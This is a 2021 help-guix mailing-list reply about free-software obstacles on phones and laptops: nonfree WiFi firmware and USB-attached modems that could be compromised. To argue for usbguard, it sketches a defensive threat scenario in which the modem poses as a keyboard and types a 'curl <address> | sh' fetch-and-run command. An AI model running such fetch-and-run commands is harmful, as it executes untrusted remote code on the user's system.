unofficial mirror of help-guix@gnu.org 
 help / color / mirror / Atom feed
From: Denis 'GNUtoo' Carikli <GNUtoo@cyberdimension.org>
To: Vagrant Cascadian <vagrant@debian.org>
Cc: help-guix@gnu.org
Subject: Re: Guix on the MNT Reform
Date: Thu, 9 Sep 2021 16:10:46 +0200	[thread overview]
Message-ID: <20210909161046.7f1b13ca@primarylaptop.localdomain> (raw)
In-Reply-To: <87czpjqak9.fsf@yucca>

[-- Attachment #1: Type: text/plain, Size: 4354 bytes --]

On Wed, 08 Sep 2021 09:47:02 -0700
Vagrant Cascadian <vagrant@debian.org> wrote:

> On 2021-09-08, Christine Lemmer-Webber wrote:
> > Denis 'GNUtoo' Carikli <GNUtoo@cyberdimension.org> writes:
> >> Here this I'MX8 issue also affect the Librem5 for instance, and
> >> probably several other devices as well. And the neat thing about
> >> the Librem 5 is that as I understand is that the modem and the
> >> WiFi cards are removable.
> >
> > I am guessing the Pinephone has a similar issue (or more) though
> > I'm not sure.
> 
> The Pinephone doesn't have that specific issue, as it's a different
> CPU (Allwinner A64), the same used on the pine64+ and pinebook, which
> are supported in Guix's u-boot. I vaguely recall those boards having
> similar types of issues early on requiring some binary blobs, but it
> was fixed in u-boot upstream with a free implementation!

WiFi:
-----
For any FSDG compliant distribution, the issue with the Pinephone will
be the WiFi: the WiFi driver requires a nonfree firmware.

There might be a way around that though: There are various Realtek
drivers that are released as GPL with the binary firmware as hex arrays
inside the drivers, in files with GPL headers.

And I even managed to find someone at an event (CCC Camp) that did a
little bit of reverse engineering on one of such binary firmwares.

Since we have GPL headers, we should be legally safe here and almost
everything should be permitted, including decompilation, automatic
reconstruction of corresponding source code, etc.

However the firmware architecture (8051) is less well supported by some
of the tools like retdec for instance, but we still have tools
like radare2, or sdcc that support it. And we even probably have several
emulators for that architecture as well.

Modem:
------
There is also another issue that affects several smartphones like the
Librem5, the GTA04 (if I recall well), and the Pinephone, but it's not
directly related to FSDG distributions: the modem is connected through
USB. It also affects some laptops with (potentially builtin) USB modems.

While it's order of magnitude better than most phones that have shared
memory[2], we still need to protect against the modem being potentially
malicious.

To do that we might need to enable usbguard or similar things and
disable usb in u-boot for instance, to be sure that the modem can't
become a keyboard.

On some devices it might be really easy for an attacker to make the
modem become a keyboard as in some cases the modem is really a
smartphone on a chip[3], and so it has some mix of Android and GNU/Linux
running in one of its processor (and probably nonfree modem firmwares /
OS running on the other processors).

So on the GNU/Linux side of the modem you can probably reconfigure the
USB peripheral to also be a keyboard. And it might not be that hard for
attackers to find vulnerabilities in the modem cellular stack and
escalate to the GNU/Linux part of the modem[4].

Once there, the attacker wound't be able to reconfigure the modem as a
keyboard and run commands with 'Alt+F2 + curl <address> | sh' if
usbguard blocks the USB reconfiguration of the modem.

And while that kind of risk might not affect everybody, I think it
would still be a good idea to address them as sometimes compromise of
smartphones can lead to people being killed by repressive political
regimes[5]. And it would be a bad thing if these people wound't be able
to use free software because of security reasons.

And here GNU/Linux has probably way more potential to achieve that than
Android in the long run due to its architecture and code quality.

References:
-----------
[1]https://libreplanet.org/wiki/Group:Hardware/research/WiFi/Realtek
[2]https://redmine.replicant.us/projects/replicant/wiki/ModemIsolationResearch
[3]https://osmocom.org/projects/quectel-modems/wiki/Pine64_Pinephone
[4]https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20video%20and%20slides/DEF%20CON%2027%20Conference%20-%20Xiling%20Gong%20-%20Exploiting%20Qualcomm%20WLAN%20and%20Modem%20Over%20The%20Air.mp4
[5]Typically smartphones and computers of dissident living abroad are
   targeted in order to find out who they work with in the repressive
   country in order to kill / torture / imprison these people.

Denis.

[-- Attachment #2: OpenPGP digital signature --]
[-- Type: application/pgp-signature, Size: 833 bytes --]

  parent reply	other threads:[~2021-09-09 14:13 UTC|newest]

Thread overview: 31+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2020-05-08 15:06 Guix on the MNT Reform Christopher Lemmer Webber
2020-05-08 18:19 ` Simon Josefsson
2020-05-09 13:03   ` Christopher Lemmer Webber
2020-05-08 18:30 ` Ekaitz Zarraga
2020-05-08 18:52 ` Vagrant Cascadian
2020-05-08 19:16   ` Leo Famulari
2020-05-08 20:44 ` John Soo
2020-09-02 22:22 ` Andreas Enge
2020-09-13 14:10   ` Andreas Enge
2020-09-15  3:23     ` Fredrik Salomonsson
2021-08-17 17:24 ` Christine Lemmer-Webber
2021-08-17 23:49   ` Fredrik Salomonsson
2021-09-05  1:31     ` Christine Lemmer-Webber
2021-09-06 17:07       ` Christine Lemmer-Webber
2021-09-06 19:37         ` Fredrik Salomonsson
2021-09-06 20:50           ` Christine Lemmer-Webber
2021-09-06 23:59             ` Fredrik Salomonsson
2021-09-07  1:13               ` Fredrik Salomonsson
2021-09-07  4:36       ` Denis 'GNUtoo' Carikli
2021-09-07 18:18         ` Christine Lemmer-Webber
2021-09-07 20:07           ` Denis 'GNUtoo' Carikli
2021-09-08 10:32             ` Christine Lemmer-Webber
2021-09-08 16:47               ` Vagrant Cascadian
2021-09-08 18:10                 ` Christine Lemmer-Webber
2021-09-09 14:10                 ` Denis 'GNUtoo' Carikli [this message]
2021-09-08 18:08               ` Christine Lemmer-Webber
2021-08-18  0:36 ` Jonathan McHugh
2021-08-29 19:10   ` Joshua Branson
2021-08-29 21:38   ` Jonathan McHugh
2021-08-29 23:27     ` Joshua Branson
2021-08-30  9:02     ` Jonathan McHugh

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

  List information: https://guix.gnu.org/

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20210909161046.7f1b13ca@primarylaptop.localdomain \
    --to=gnutoo@cyberdimension.org \
    --cc=help-guix@gnu.org \
    --cc=vagrant@debian.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).